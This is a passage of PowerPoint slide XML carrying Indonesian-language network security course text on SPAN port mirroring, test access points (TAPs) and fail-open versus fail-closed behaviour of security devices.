              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditunjuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicerminkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jatuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Test access point (TAP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>induktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port monitor. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tembaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SPAN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> frame - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cacat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyalinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpengaruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59569017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Gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>-Buka versus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gagal-Tutup</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasuki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Bisa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didamaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lonjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bug, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelelahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
